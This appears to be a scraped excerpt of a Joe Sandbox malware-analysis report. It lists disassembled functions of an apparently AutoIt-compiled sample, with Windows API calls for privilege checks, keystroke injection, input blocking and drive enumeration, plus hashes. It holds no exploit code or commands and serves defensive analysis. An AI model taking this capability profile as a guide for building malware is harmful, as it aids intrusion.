Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
Instruction ID: 8f838fc8bc7c5ece16caeacf73a239be1367e9dad809fc627f573c20c414a3df
Opcode Fuzzy Hash: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
Instruction Fuzzy Hash: E9113C75E05328BBDB109F959C85FEFBFBCEB45B50F108115F904E7290D6704A058BA1

Function 00DB1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DB168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DB16A1
FreeSid.ADVAPI32(?), ref: 00DB16B1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
Instruction ID: e6521362dd8f36c27e385f59b21c9511b1d3b669ba55af88e69312f4cfb59597
Opcode Fuzzy Hash: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
Instruction Fuzzy Hash: 6FF0F475950309FBDB00DFE49C8AAAEBBBCEB08604F504565E501E6281E774AA448A60

Function 00D8C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00D8C36C

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 5c47ec493661a83b6890eac6834c99289463c9e49a3c92e75b3301648ea378e4
Instruction ID: 3fe9966c5f1f962c52478b04f942b9cf1fa0882bad85ce02678309fbb108297f
Opcode Fuzzy Hash: 5c47ec493661a83b6890eac6834c99289463c9e49a3c92e75b3301648ea378e4
Instruction Fuzzy Hash: 1E412772900219EFCB20AFB9DC89EBB77B8EB84314F548269F905D7180F6719D818B74

Function 00DC68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DC6918
FindClose.KERNEL32(00000000), ref: 00DC6961

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 2686a08e82bce30e27528d3d4c15ca850becaa875a17c40b946ef1aee864800d
Instruction ID: aa6d0a55f16035429d5efffcb5e97a2f47fbdd2359b4e1d182f670cd7ee19819
Opcode Fuzzy Hash: 2686a08e82bce30e27528d3d4c15ca850becaa875a17c40b946ef1aee864800d
Instruction Fuzzy Hash: 29117F716142019FC710DF69D885A16BBE5EF85329F14C69DE9698F2A2CB30EC05CBA1

Function 00DC37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37F4

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f907c757f0e12cec95bdf99095ae12b4c906f4bc2ab6ff8eab73029142e1c328
Instruction ID: 57ed6b71bbd5dc0797637665dc8c1f2ab1dc3fce239f547d292bf7c74f2e87df
Opcode Fuzzy Hash: f907c757f0e12cec95bdf99095ae12b4c906f4bc2ab6ff8eab73029142e1c328
Instruction Fuzzy Hash: 07F0E5B16043296AEB2027A68C8DFEB7AAEEFC5761F000165F909D32D1D9709904C7B0

Function 00DBB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DBB25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00DBB270

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1544ecc531b9390d4b1085b884bdd16c6760563fa0684d67f52097c7a683bf5e
Instruction ID: a3c2bb81ec2a8d0c8a50f270d081620bde491622672fe1507aa4f1d0f74ac00f
Opcode Fuzzy Hash: 1544ecc531b9390d4b1085b884bdd16c6760563fa0684d67f52097c7a683bf5e
Instruction Fuzzy Hash: F3F01D7181438DABDB059FA1C805BEE7BB4FF04315F04900AF966A9191C379C6129FA4

Function 00DB10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 64be1b01841a79910d5206cce000fc5f0e18dca75f681cd9c01581abd7ad25cc
Instruction ID: dcaf265b821a2ba16a76149a670b41f8087a88271cdfca38010c91cca0a2e71f
Opcode Fuzzy Hash: 64be1b01841a79910d5206cce000fc5f0e18dca75f681cd9c01581abd7ad25cc
Instruction Fuzzy Hash: 08E04F32014700EFE7252B11FC05E737BA9FB04310B14882EF4A6844B1DB626C90DB30

Function 00DCEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00DCEABD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
Instruction ID: a6181240a5e1722365a5b62ff94e29aaefc848296922ce0f431697dfd3e66159
Opcode Fuzzy Hash: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
Instruction Fuzzy Hash: F5E01A712102059FC710EF69D844E9AB7E9EF98760F00841AFC49CB361DA70E8458BB0

Function 00D709D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D703EE), ref: 00D709DA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
Instruction ID: 2e509bf343e71a02aa2c695c7bdab33ce609e5e65a959463c09a9d9adcac4d81
Opcode Fuzzy Hash: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
Instruction Fuzzy Hash:

Function 00DD2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DD2B30
DeleteObject.GDI32(00000000), ref: 00DD2B43
DestroyWindow.USER32 ref: 00DD2B52
GetDesktopWindow.USER32 ref: 00DD2B6D
GetWindowRect.USER32(00000000), ref: 00DD2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DD2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DD2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2CF8
GetClientRect.USER32(00000000,?), ref: 00DD2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DD2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DA8
GlobalFree.KERNEL32(00000000), ref: 00DD2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00DEFC38,00000000), ref: 00DD2DDB
GlobalFree.KERNEL32(00000000), ref: 00DD2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DD2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DD2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD303F

Strings

AutoIt v3, xrefs: 00DD2CF2
DISPLAY, xrefs: 00DD2EA2
static, xrefs: 00DD2D3A, 00DD2E91
, xrefs: 00DD2FC5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
Instruction ID: 61322a032b60bd3b7a4c8fda2c36c03efd25e7e11613bc69e5a514694efe2944
Opcode Fuzzy Hash: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
Instruction Fuzzy Hash: 62026B71910208AFDB14DF68CC89EAE7BB9EF48311F148559F915AB2A1DB70AD06CB70

Function 00DE70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00DE712F
GetSysColorBrush.USER32(0000000F), ref: 00DE7160
GetSysColor.USER32(0000000F), ref: 00DE716C
SetBkColor.GDI32(?,000000FF), ref: 00DE7186
SelectObject.GDI32(?,?), ref: 00DE7195
InflateRect.USER32(?,000000FF,000000FF), ref: 00DE71C0
GetSysColor.USER32(00000010), ref: 00DE71C8
CreateSolidBrush.GDI32(00000000), ref: 00DE71CF
FrameRect.USER32(?,?,00000000), ref: 00DE71DE
DeleteObject.GDI32(00000000), ref: 00DE71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00DE7230
FillRect.USER32(?,?,?), ref: 00DE7262
GetWindowLongW.USER32(?,000000F0), ref: 00DE7284

Part of subcall function 00DE73E8: GetSysColor.USER32(00000012), ref: 00DE7421
Part of subcall function 00DE73E8: SetTextColor.GDI32(?,?), ref: 00DE7425
Part of subcall function 00DE73E8: GetSysColorBrush.USER32(0000000F), ref: 00DE743B
Part of subcall function 00DE73E8: GetSysColor.USER32(0000000F), ref: 00DE7446
Part of subcall function 00DE73E8: GetSysColor.USER32(00000011), ref: 00DE7463
Part of subcall function 00DE73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DE7471
Part of subcall function 00DE73E8: SelectObject.GDI32(?,00000000), ref: 00DE7482
Part of subcall function 00DE73E8: SetBkColor.GDI32(?,00000000), ref: 00DE748B
Part of subcall function 00DE73E8: SelectObject.GDI32(?,?), ref: 00DE7498
Part of subcall function 00DE73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00DE74B7
Part of subcall function 00DE73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DE74CE
Part of subcall function 00DE73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00DE74DB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: bbc68fdd220a395e9f64d9ca462b87b3caa89d219839447f3287a4425807ed4b
Instruction ID: c5b58b6279def78b4caef67ec754336fe2af336b6e98ca4959464b2dc539655a
Opcode Fuzzy Hash: bbc68fdd220a395e9f64d9ca462b87b3caa89d219839447f3287a4425807ed4b
Instruction Fuzzy Hash: 93A1B472018341AFD741AF60DC88E5B7BA9FB49320F141A19FAA2DA2E1D731E945CB71

Function 00D68D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00D68E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00DA6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DA6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DA6F43

Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5

SendMessageW.USER32(?,00001053), ref: 00DA6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DA6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00DA6FB7

Strings

0, xrefs: 00DA6DCF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
Instruction ID: 3cee1a9c58d68463dd90eb2ff288a21155b8cd48171f4e44f2c968e41f6d5864
Opcode Fuzzy Hash: faec075dbfed445b00e736b1f74be739aa511a94a5b304ee90ea8ccb0975161b
Instruction Fuzzy Hash: A7129D30200241DFDB25DF24C884BA6BBE5FB5A311F1C8569F485DB262CB32E996DB71

Function 00DD2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00DD273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DD286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DD28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DD28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DD2900
GetClientRect.USER32(00000000,?), ref: 00DD290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DD2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DD2964
GetStockObject.GDI32(00000011), ref: 00DD2974
SelectObject.GDI32(00000000,00000000), ref: 00DD2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DD2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD2991
DeleteDC.GDI32(00000000), ref: 00DD299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DD29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00DD29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DD2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DD2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00DD2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DD2A77
GetStockObject.GDI32(00000011), ref: 00DD2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DD2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DD2A97

Strings

AutoIt v3, xrefs: 00DD28F8
msctls_progress32, xrefs: 00DD2A13
DISPLAY, xrefs: 00DD295A
static, xrefs: 00DD294F, 00DD2A71

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
Instruction ID: 13892bda2defc237e7e1a6c5255b557426d16d8863c25ceaa73b4fcc2f98fe7a
Opcode Fuzzy Hash: 712f2a08110b87fedc3ab64730f9b96a10239f2cb09d468037443766349beea5
Instruction Fuzzy Hash: F0B17C71A10315AFEB24DF68CC89FAE7BA9EB08711F004155F914EB2A0D770ED45CBA0

Function 00DC4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DC4AED
GetDriveTypeW.KERNEL32(?,00DECB68,?,\\.\,00DECC08), ref: 00DC4BCA
SetErrorMode.KERNEL32(00000000,00DECB68,?,\\.\,00DECC08), ref: 00DC4D36

Strings

SSD, xrefs: 00DC4C4A
Virtual, xrefs: 00DC4CE5
SCSI, xrefs: 00DC4C8A
PhysicalDrive, xrefs: 00DC4B76
ATAPI, xrefs: 00DC4C91
ATA, xrefs: 00DC4C98
RAMDisk, xrefs: 00DC4BF4
1394, xrefs: 00DC4C9F
Removable, xrefs: 00DC4C10, 00DC4C15
SSA, xrefs: 00DC4CA6
Unknown, xrefs: 00DC4BED, 00DC4C83
MMC, xrefs: 00DC4CDE
iSCSI, xrefs: 00DC4CC2
SAS, xrefs: 00DC4CC9
RAID, xrefs: 00DC4CBB
FileBackedVirtual, xrefs: 00DC4CEC
CDROM, xrefs: 00DC4BFB
Fixed, xrefs: 00DC4C09
\\.\, xrefs: 00DC4B3F
Fibre, xrefs: 00DC4CAD
Network, xrefs: 00DC4C02
SATA, xrefs: 00DC4CD0
USB, xrefs: 00DC4CB4

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8647a6ad1504fd78ed3ccbe13389b9ba62d41fd14363972f814992dab76bdb65
Instruction ID: f8c1ed6f55b8b44ec54bd4bd0bfb86688c4e7edae1ab528f8d8319f55c943df5
Opcode Fuzzy Hash: 8647a6ad1504fd78ed3ccbe13389b9ba62d41fd14363972f814992dab76bdb65
Instruction Fuzzy Hash: 2761A030605207DBDB14EF28CAA2EA9B7B1EF44344B24541DFC46AB2A1DB31ED85DB71

Function 00DE73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00DE7421
SetTextColor.GDI32(?,?), ref: 00DE7425
GetSysColorBrush.USER32(0000000F), ref: 00DE743B
GetSysColor.USER32(0000000F), ref: 00DE7446
CreateSolidBrush.GDI32(?), ref: 00DE744B
